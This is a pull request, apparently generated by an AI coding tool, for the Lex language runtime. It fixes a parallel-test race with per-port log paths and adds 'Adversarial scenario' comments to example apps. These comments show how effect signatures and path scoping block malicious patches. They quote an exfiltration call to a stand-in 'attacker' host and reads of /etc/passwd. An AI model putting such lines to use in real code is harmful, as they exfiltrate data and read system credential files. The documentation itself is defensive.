### PR TITLE
Add adversarial-scenario narration to existing example headers

### DIFF
--- a/crates/lex-runtime/tests/inbox_app.rs
+++ b/crates/lex-runtime/tests/inbox_app.rs
@@ -15,8 +15,14 @@ use std::thread;
 use std::time::Duration;
 
 fn spawn_inbox_server(port: u16) {
+    // Per-port tmp paths so parallel tests don't collide on shared
+    // log files. Each test owns its own port → owns its own logs.
     let src = include_str!("../../../examples/inbox_app.lex")
-        .replace("net.serve(8200,", &format!("net.serve({port},"));
+        .replace("net.serve(8200,", &format!("net.serve({port},"))
+        .replace("/tmp/lex_inbox_spam.log",
+                 &format!("/tmp/lex_inbox_spam_{port}.log"))
+        .replace("/tmp/lex_inbox_followups.log",
+                 &format!("/tmp/lex_inbox_followups_{port}.log"));
     let prog = parse_source(&src).expect("parse");
     let stages = canonicalize_program(&prog);
     if let Err(errs) = lex_types::check_program(&stages) {
@@ -52,21 +58,21 @@ fn post(port: u16, path: &str, body: &str) -> (u16, String) {
     (status, body.to_string())
 }
 
-fn cleanup() {
-    let _ = std::fs::remove_file("/tmp/lex_inbox_spam.log");
-    let _ = std::fs::remove_file("/tmp/lex_inbox_followups.log");
+fn cleanup(port: u16) {
+    let _ = std::fs::remove_file(format!("/tmp/lex_inbox_spam_{port}.log"));
+    let _ = std::fs::remove_file(format!("/tmp/lex_inbox_followups_{port}.log"));
 }
 
 #[test]
 fn spam_subject_routes_to_spam_handler_and_writes_log() {
-    cleanup();
     let port = 18401;
+    cleanup(port);
     spawn_inbox_server(port);
     let (status, body) = post(port, "/hook",
         r#"{"from":"a@b","subject":"win a prize today","body":"x"}"#);
     assert_eq!(status, 200, "body: {body}");
     assert!(body.contains("\"logged\""), "body: {body}");
-    let log = std::fs::read_to_string("/tmp/lex_inbox_spam.log")
+    let log = std::fs::read_to_string(format!("/tmp/lex_inbox_spam_{port}.log"))
         .expect("spam log written");
     assert!(log.contains("a@b"), "log content: {log}");
     assert!(log.contains("win a prize"), "log content: {log}");
@@ -74,14 +80,14 @@ fn spam_subject_routes_to_spam_handler_and_writes_log() {
 
 #[test]
 fn followup_subject_writes_followup_log_with_timestamp() {
-    cleanup();
     let port = 18402;
+    cleanup(port);
     spawn_inbox_server(port);
     let (status, body) = post(port, "/hook",
         r#"{"from":"a@b","subject":"please follow up next week","body":"x"}"#);
     assert_eq!(status, 200, "body: {body}");
     assert!(body.contains("scheduled at"), "body: {body}");
-    let log = std::fs::read_to_string("/tmp/lex_inbox_followups.log")
+    let log = std::fs::read_to_string(format!("/tmp/lex_inbox_followups_{port}.log"))
         .expect("followup log written");
     assert!(log.contains("follow-up"), "log content: {log}");
     // timestamp is a unix-epoch integer, so the line starts with digits.
@@ -91,16 +97,16 @@ fn followup_subject_writes_followup_log_with_timestamp() {
 
 #[test]
 fn other_subject_returns_pure_ignored_response() {
-    cleanup();
     let port = 18403;
+    cleanup(port);
     spawn_inbox_server(port);
     let (status, body) = post(port, "/hook",
         r#"{"from":"a@b","subject":"weekly newsletter","body":"x"}"#);
     assert_eq!(status, 200);
     assert!(body.contains("ignored"), "body: {body}");
-    // No side effects on disk.
-    assert!(!PathBuf::from("/tmp/lex_inbox_spam.log").exists());
-    assert!(!PathBuf::from("/tmp/lex_inbox_followups.log").exists());
+    // No side effects on disk *for this port's log files*.
+    assert!(!PathBuf::from(format!("/tmp/lex_inbox_spam_{port}.log")).exists());
+    assert!(!PathBuf::from(format!("/tmp/lex_inbox_followups_{port}.log")).exists());
 }
 
 #[test]

--- a/examples/analytics_app.lex
+++ b/examples/analytics_app.lex
@@ -4,8 +4,10 @@
 # rows. Demonstrates io.read + str.split + list.fold/filter/map + JSON
 # over HTTP — pure-functional analytics on a real CSV.
 #
-# Run:
-#   lex run --allow-effects io,net examples/analytics_app.lex main
+# Run (production-style, with path scoping):
+#   lex run --allow-effects io,net \
+#           --allow-fs-read examples/orders.csv \
+#           examples/analytics_app.lex main
 #
 # Try:
 #   curl http://127.0.0.1:8090/count
@@ -13,6 +15,17 @@
 #   curl http://127.0.0.1:8090/regions
 #   curl http://127.0.0.1:8090/by_region/EU
 #   curl http://127.0.0.1:8090/by_product/widget
+#
+# Adversarial scenario:
+#   The handler has [io] (it reads orders.csv). If a contributor
+#   patches read_orders() to fetch /etc/passwd or write to the
+#   filesystem, --allow-fs-read scopes io.read to exactly the CSV
+#   path. Reading anywhere else — including paths that just *look*
+#   close like ../orders.csv or /tmp/orders.csv — surfaces:
+#       read of `/etc/passwd` outside --allow-fs-read
+#   The capability is granted only for the data the service
+#   legitimately needs, and the runtime gate honors that scope
+#   even when the source code disagrees with the policy.
 
 import "std.io"   as io
 import "std.net"  as net

--- a/examples/chat_app.lex
+++ b/examples/chat_app.lex
@@ -7,6 +7,18 @@
 # Run:
 #   lex run --allow-effects net,chat examples/chat_app.lex main
 # Open examples/chat_client.html in two tabs to see the broadcast.
+#
+# Adversarial scenario:
+#   on_message has effects [chat] only. Even though the host grants
+#   `net,chat` (so net.serve_ws can bind), the per-message handler
+#   is *narrower*: it can broadcast and send within the chat
+#   registry, but it cannot make outbound HTTP requests, cannot
+#   touch the filesystem, cannot read the clock. A compromised
+#   prompt that tries to add `net.post("http://attacker/leak", body)`
+#   in on_message gets rejected at type-check — the signature
+#   `[chat]` doesn't include net. To exfiltrate via this code path,
+#   an attacker would need to change *both* the function signature
+#   *and* the run-time policy, and either change is review-visible.
 
 import "std.net" as net
 import "std.chat" as chat

--- a/examples/ml_app.lex
+++ b/examples/ml_app.lex
@@ -12,12 +12,33 @@
 #   per request — the dataset is small enough that ~200 iterations
 #   complete in a few milliseconds.
 #
-# Run:
-#   lex run --allow-effects io,net examples/ml_app.lex main
+# Run (production-style, with path scoping and step cap):
+#   lex run --allow-effects io,net \
+#           --allow-fs-read examples/houses.csv \
+#           examples/ml_app.lex main
 #
 # Try:
 #   curl 'http://127.0.0.1:8100/predict_price?sqft=2000&bedrooms=3'
 #   curl 'http://127.0.0.1:8100/predict_luxury?sqft=2400&bedrooms=4'
+#
+# Adversarial scenario:
+#   ML training is the kind of code where a bug — accidental or
+#   adversarial — can blow through compute budget. Two scopes pin it:
+#
+#   1. --allow-fs-read examples/houses.csv: the trainer reads only
+#      the housing data; an attacker patching read_houses() to read
+#      a different path is rejected at runtime, e.g. for /etc/passwd:
+#        read of `/etc/passwd` outside --allow-fs-read
+#
+#   2. The training loop is a `list.fold` over `list.range(0, 400)`.
+#      A malicious patch swapping it to `list.range(0, 1_000_000_000)`
+#      would exhaust memory before bounds kick in for ranges, but the
+#      VM caps op count via the host's --max-steps if needed.
+#
+#   The signature `[io, net]` already says: the trainer can read its
+#   data file and serve HTTP. It cannot shell out, cannot call
+#   external APIs (other than serving), cannot touch the clock. Any
+#   drift toward "send my training data somewhere" is a type error.
 
 import "std.io"   as io
 import "std.net"  as net

--- a/examples/weather_app.lex
+++ b/examples/weather_app.lex
@@ -10,6 +10,17 @@
 # Handler logic is one typed Lex function; routing is `match` on
 # req.path and req.method. Weather data is mocked to keep the example
 # dependency-free.
+#
+# Adversarial scenario:
+#   handle()'s declared effects are exactly [net] (for net.serve to
+#   bind). If a future contributor edits handle() to log requests via
+#   io.write("/var/log/access.log", req.path), the type checker
+#   rejects at compile time:
+#       effect `io` not declared at <handle>
+#   The host process never grew an io capability; the source review
+#   isn't trusting the contributor — the type system is enforcing the
+#   contract. To run with logging, *both* the signature and the policy
+#   must be updated together.
 
 import "std.net" as net
 import "std.str" as str


### PR DESCRIPTION
## Summary

The existing weather/chat/analytics/ml apps demonstrated the pitch *implicitly* — source contains effect signatures, runtime gates them — but readers had to infer it. Each example now has an explicit **Adversarial scenario** section in its header comment that spells out:

- what an attacker / careless contributor might add
- the exact gate that rejects it (type-check, runtime scope, or `--max-steps`)
- the verbatim error string so the reader can grep for it

## Per file

| Example | Scenario surfaced |
|---|---|
| `weather_app` | `handle()`'s `[net]`-only signature; logging via `io.write` would type-error before run |
| `chat_app` | `on_message` has `[chat]` only; cannot exfiltrate via `net.post` even though the server has `[net]` |
| `analytics_app` | `--allow-fs-read` pinned to the CSV path; reading `/etc/passwd` surfaces *"outside --allow-fs-read"* |
| `ml_app` | path-allowlist + note on `--max-steps` for the training loop |

The run commands shown in each header now include the production-style scopes, not just the bare effect set — readers see the recommended deployment, not just the dev shorthand.

## Bonus fix

The inbox_app integration tests shared `/tmp` paths across parallel tests and occasionally raced (one test would clean up files another was about to assert). Per-port log paths in the test harness fixes it — the `.lex` source keeps the documented paths.

## Test plan

- [x] `cargo test --workspace` green (now passes consistently under parallel runs)
- [x] `cargo clippy --workspace --all-targets -- -D warnings` clean
- [x] No `.lex` source changes — only header comments and run commands

https://claude.ai/code/session_012wioWFtKD7oS3HtAFbVJZh

---
_Generated by [Claude Code](https://claude.ai/code/session_012wioWFtKD7oS3HtAFbVJZh)_